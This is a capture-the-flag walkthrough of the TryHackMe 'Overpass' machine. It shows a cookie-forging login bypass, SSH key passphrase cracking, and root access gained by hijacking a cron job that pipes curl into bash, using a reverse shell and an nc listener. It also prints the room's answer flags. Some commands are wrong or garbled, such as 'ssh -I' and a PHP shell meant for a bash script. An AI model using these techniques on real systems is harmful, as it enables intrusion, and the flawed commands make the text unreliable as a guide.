THM Machine: Overpass

Overview

What happens when a group of broke Computer Science students try to make a password manager? Obviously a perfect commercial success!

Scanning

Tool: Nmap

Command:

$ sudo nmap -sC -sV -A -oN nmap/initial <IP Address Here>

-sC: Scan with common scripts
-sV: Scan with Service Version detection
-A: Scan in Aggressive Mode(Traceroout, OS detection,)
-oN: Save Output in Normal Format

Scan Results/Report

Nmap scan report for 10.10.13.108
Host is up (0.17s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA)
|   256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA)
|_  256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519)
80/tcp   open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Overpass

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=7/12%OT=22%CT=1%CU=33529%PV=Y%DS=2%DC=T%G=Y%TM=60EC64B
OS:D%P=i686-pc-windows-windows)SEQ(SP=104%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A
OS:)SEQ(CI=Z%II=I)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508
OS:ST11NW7%O5=M508ST11NW7%O6=M508ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W
OS:5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y
OS:%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%
OS:T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD
OS:=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE
OS:(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 199/tcp)
HOP RTT       ADDRESS
1   176.00 ms 10.8.0.1
2   176.00 ms 10.10.13.108

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.11 seconds

As we can see from the nmap scan report there are 2 open ports

Port 22 for ssh
Port 80 for http

Assumption

As there are two open ports so and now we know our attacking area. SSH required Username and Password or Username and Key to get the system access but that takes time and the success rate is low so we ignore it right now and move into the HTTP. Target has a web server/web application running on port 80 and that has a good area for the attack so we enumerate this and find a way to exploit the system

Enumeration

Web Directories Scanning

Tool: ffuf

Command:

$ ffuf -w wordlist.txt: FUZZ -u http://IP:PORT/FUZZ -ic

-w: For Directory Scanning Wordlist i.e directory-list-2.3-small.txt from Seclists
:FUZZ: This is a keyword that passes to the ffuf that tells ffuf where they have to start Fuzzing
-u: For give him a URL of the Target
-ic: ignore wordlist comments

OR you can use gobustor for this also

Command:

$ gobustor dir -w wordlist.txt -u http://IP:PORT

dir: Tell gobustor that we scan for Directories
-w: For Directory Scanning Wordlist i.e directory-list-2.3-small.txt from Seclists
-u: To tell gobuster to scan in this URL

Results:

img                     [Status: 301, Size: 0, Words: 1, Lines: 1]
downloads               [Status: 301, Size: 0, Words: 1, Lines: 1]
about us                 [Status: 301, Size: 0, Words: 1, Lines: 1]
admin                   [Status: 301, Size: 42, Words: 3, Lines: 3]
css                     [Status: 301, Size: 0, Words: 1, Lines: 1]

Findings:

As we can see from the result that there are hidden directory /admin that have a login panel that required a username and password for login I tried some common passwords like admin:admin and they are incorrect so we bruteforce it for login credentials but in THM hint they say "OWASP Top 10 Vuln! Do NOT bruteforce." so we don't have to bruteforce this we have to find a vulnerability from its source code and press CTRL + U to get the source code and we can see there are three js file on the source

main.js
login.js
cookie.js

The login function is work with the javascript name called login.js as we can see so we can read it to know how login work. As in the login.js file when we see the following function

async function login() {
    const usernameBox = document.querySelector("#username");
    const passwordBox = document.querySelector("#password");
    const loginStatus = document.querySelector("#loginStatus");
    login status.textContent = ""
    const creds = { username: usernameBox.value, password: password box. value }
    const response = await postData("/api/login", creds)
    const statusOrCookie = await a response.text()
    if (statusOrCookie === "Incorrect credentials") {
        login status.textContent = "Incorrect Credentials"
        password box.value="
    } else {
        Cookies.set("SessionToken",statusOrCookie)
        window.location = "/admin"

They are just used if else for login checks. when we enter some credentials they call /api/login to check credentials from creds if the credentials don't match they send a response "Incorrect credentials". Else set a cookie with a javascript function cookie. set with the SessionToken with the value statusorcookie variable response now further check for session token so we can use it with our own made session token with the value of something we want with following js function

cookies.set("SessionToken", "admin")

Use this function of your browser js console in inspector mode/Develpor Mode use CTRL + SHIFT + I in Chrome to go to inspector mode when you use this function on your browser console they set a cookie with the `session token with the value admin so just reload the page and you got a login to the Administrator area

There you can see some messages to the person named James that says

Since you keep forgetting your password, James, I've set up SSH keys for you.

If you forget the password for this, crack it yourself. I'm tired of fixing stuff for you.  
Also, we need to talk about this "Military Grade" encryption. - Paradox

This message has an SSH private key for user James but this private key has a password on it but we can crack it

Exploitation

So we have an SSH private key for user James but this key has a password set on the key so we have to crack that ssh key password first to login to the system first so to do that we have to copy the private key to a file, for now, I name it id.rsa

Tool: ssh2john

Command:

$ ssh2john id.rsa --wordlist=rockyou.txt > id.hash

ssh2john: Script name
id.rsa: Private key file that we want to crack
--wordlist: For wordlist that they use to crack passwords i.e rockyou.txt
id.hash: This will create a file name id.hash and write/redirect all the output of the ssh2john file and save it into your directory

Result:

id.rsa:$sshng$1$16$9F85D92F34F42626F13A7493AB48F337$1200$2cdbb9c10041cfba4a67771ce135a5c4852e0ffa29262d435693dad3aa708871e17bc663c37feffb19e6b52dcefaa88d2479cb4bca14551e929a8b30e29a8b19c3f70302afaf30d6b70db270eee635d36ccf02e9deeb68ec435d4c86f3bc96a5ef7fde50df64605d2e6bdad90ba9b0a08da21bab1d94d2f866ab1863baebbc3c5e099264833406ce407dc0a830d658d3583cb2f2a9dc963ba03887fc42b1e8a37d06bfe74031f8a94d2478dc518167f1e16b88c3ca45173f43efb85c936d576f04c5e6af7c6e2a407a23a93f8cb8ea59c2eb84f592d2a449ef5f06feef1ca985f7a0998cd0ea378e0a17617c5ec0649900be5b2d0161649346a19f8de671ce965d4e065d6d9ac50847060aef04fff64bd488bdeb8640544615486e3daa887c51dcac264b80e6e003ada0f4c802657268a9825a8a5fea57b5fb0cd9fd4a6b3420207864e564a5ff8e8aee5bb649b8051f0016d12cbc0554f3206a1ac1a7abd17cd1024b1ced6c59973e8570bd6450f7c67ea7c3223a845e6fb25fbaccba1af66455f5b68299a402bf320d0ca752e92859ec4f7831d6892960d644492ab40fec60aea6f5bfaff61cd5198d4dfcd3e5e7913a450e4ccaa67772e3d3bc842f26af9411ebcf9149bf33ccdeb8a647012c97c187d75d43e0be6b00a55cbac745720f0ff4142e9166f35591db690b401951b2d05289bf55a103ea634cbab053e735e5617b10d6f70e6e6a754a124a53f3463cde79a3c6e4ee14f45ab465a60f90c972242cd1569e370dee0a2a4c8ee4543ec52c5c7b7156d1beb7fbc4448188ab386719e13040a58faecf7e095def2312586b295f71c3fef31b62e890a3279631b6605200a6bf7d9d915566cd5738508291c33c18585ea13e32170ad7854d5f8d08d6fdc47491b84ebfb45f579c7b2f7eb1dd9b827c17655a4b7f8763399e8c2371b6277b1c4eb8e76a75acd38eb5cec913723ad605f563cb84b4476a9040917cef352384441dd325c6bcc9d6cab326ac7421b20083d7e766e2a01943860f0398f0294750b5cd16304f52c414ab7b28a01aa206f0dc6e6b692cc1e78310a57e962fec24ea9effc0e5fa58ca35325905f793370bb7713c512ca4b1dfa41c5fdaacacf4ca81b1dd2b2e45e8611ea0a5b19b016e7c74f9b9d4c7a41c3f9678ff284d8188e0f5424bf585f94f741adcb452683223da9fc4c548bb505c98987387c81db53d229f42f3e69298fab2f175468003d295c05b1d8979d78c7104d54c270eaaabbe006ebd7e8dbb1fa17e05e2f41b32ebca93f0789429312cba472ffc86072b5b3e530fc7e405ad26c166590b376f0f98e22c3e60b66899703813bcb13d7c9f5a6e0ae05320de78347b8ffb1d160949a5cb40e29e37071ffcb5b9762a4eec39818d52ec0bc7b227cba37aeb4ffc6700e65eb3ca5aa294e823e3eca24bcd7790d4e30893b0291b178368ca6e745af1bedd491cfb6836552e9267132f5b867e9aed6b52e3d4f14e88b9dd9075e3ea2e8242f8b2f272618211b908eb52689ead701d99b605f708a68662df7a5acc7287ce1d15b6fa12f5907953b49654f198f663663785deb244d25c220083ae62db9fd0b933477b83487606515a24864e6034ba27a624d9c5a4fcc967efe3a1000a40bc304a54ceff2c647dfec54f71e128b3a1d37c15db9ac895f9ea05cd4b6e8edca6bfc53b

This command first changes the ssh private key format into a hash format that the JohnTheRipper tool will understand and save it into your system directory with the name id.hash. Now we can crack that hash with john/JohnTheRipper

Tool: john

Command:

$ john id.hash --wordlist= rockyou.txt

john This is a tool used to crack password hashes
id.hash This is the hash file that creates by the ssh2john in the above task
--wordlist= This is used to specify password wordlist i.e rockyou.txt

Result:

Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OpenSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
james13          (id.rsa)
1g 0:00:00:10 DONE (2021-07-13 13:34) 0.09699g/s 1391Kp/s 1391Kc/s 1391KC/sa6_123..*7¡Vamos!
Session completed

This command gives us the password of the private key so now we can login to the James user using ssh

Initial Access

So we have the Private key, Username, and Private Key password so now we are fully capable of login into the system but first we have to change the private key permission as only we can read and write it no one else

Command:

$ chmod 600 id.rsa

This command changes the permission of the private key so only we can read it

Now time to login using ssh

$ ssh -I id.rsa james@IP_Address_here

Result:

└─$ ssh -I id.rsa james@10.10.179.213
The authenticity of host '10.10.179.213 (10.10.179.213)' can't be established.
ECDSA key fingerprint is SHA256:4P0PNh/u8bKjshfc6DBYwWnjk1Txh5laY/WbVPrCUdY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.179.213' (ECDSA) to the list of known hosts.
Enter the passphrase for key 'id.rsa':
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-108-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Jul 13 08:52:08 UTC 2021

  System load:  0.08               Processes:           88
  Usage of /:   22.3% of 18.57GB   Users logged in:     0
  Memory usage: 14%                IP address for eth0: 10.10.179.213
  Swap usage:   0%


47 packages can be updated.
0 updates are security updates.


Last login: Sat Jun 27 04:45:40 2020 from 192.168.170.1
james@overpass-prod:~$

So we have now access to the James user. use the *ls command to see the files

james@overpass-prod:~$ ls
todo.txt  user.txt

Cat user.txt file to see the flag.

Privilege Escalation

There is also a file name todo.txt as you can see above and this has the following thing this show on the last line they update the overpass build on the website from somewhere on the system using some unknown method for us

$ cat todo.txt
 
To Do:
> Update Overpass Encryption, Muirland has been complaining that it's not strong enough
> Write down my password somewhere on a sticky note so that I don't forget it.
  Wait, we make a password manager. Why don't I just use that?
> Test Overpass for macOS, it builds fine but I'm not sure it works
> Ask Paradox how he got the automated build script working and where the builds go.
  They're not updating the website

So let's start exploring some priv-escalation vectors

First search some SUID binaries using the find command like following

Result:

$ find / -perm /4000 2>/dev/null

/bin/fusermount
/bin/umount
/bin/su
/bin/mount
/bin/ping
/usr/bin/chin
/usr/bin/at
/usr/bin/ssh
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/lib/eject/decrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign

So we could not find something interesting in SUID bit binaries so we have to dig more

Search for common files like

/etc/shadow
/etc/passwd
/etc/crontab
/etc/hosts

$ ls -al /etc/crontab /etc/shadow /etc/passwd /etc/hosts

-rw-r--r-- 1 root root    822 Jun 27, 2020,/etc/crontab
-rw-rw-rw- 1 root root    250 Jun 27  2020 /etc/hosts
-rw-r--r-- 1 root root   1614 Jun 27  2020 /etc/passwd
-rw-r----- 1 root shadow 1064 Jun 27  2020 /etc/shadow

As we can see from above the *crontab file is readable so we can check it

 $ cat /etc/crontab
 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
# Update builds from the latest code
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash

So the crontab the file shows us the method they use to update their overpass build with the latest code. They use curl to the overpass.thm/downloads/src/buildscript.sh and pipe this into bash and they are run as a root so this will be our priv-escalation vector if we can abuse this. We know from the Above that the/etc/hosts file are read and writable so we can use this to change its local DNS file and leverage it into run our own script that gives us a root shell by using the following commands

$ nano /etc/hosts

127.0.0.1 localhost
127.0.1.1 overpass-prod
10.8.186.33 overpass.thm # This is my THM IP Change this IP with your IP Address
# The following lines are desirable for IPv6-capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

This is the content of the /etc/hosts file and I change the 127.0.0.1 IP of the 3rd line with my machine IP Address. Now go to your machine and make a directories name downloads/src/ like the following

$ mkdir -p downloads/src/

This will create a downloads directory and inside it they also create src directory

Now go src directory using the following command

$ cd downloads/src

Now make a file with the name buildscript.sh

$ touch buildscript.sh

Now write the file with the following revershell in the file

Pentestmonkey PHP reverse shell

Note: Change the IP Address with your machine IP and PORT with 8080

Now start the Python server Using the following command

$ sudo python -m http.server 80

Note: Start the server on the same directory where you create downloads directory not in the src directory

Now open a listener on the system using the following command

$ nc -lnvp 8080

Now wait for the script to execute on the system. When the script executes on the system you got the connection from your nc listener and your got root access to the system

Now cat the root.txt and submit it to Tryhackme

THM Overpass Answers

Q: Hack the machine and get the flag in user.txt

A: thm{65c1aaf000506e56996822c6281e6bf7}

Hint: OWASP Top 10 Vuln! Do NOT brute force.

Q: Escalate your privileges and get the flag in root.txt

A: thm{7f336f8c359dbac18d54fdd64ea753bb}

PreviousTHM Room: OWASP Top 10 Answers NextTHM Machine: Overpass 2 - Hacked

Last updated 2 years ago

Was this helpful?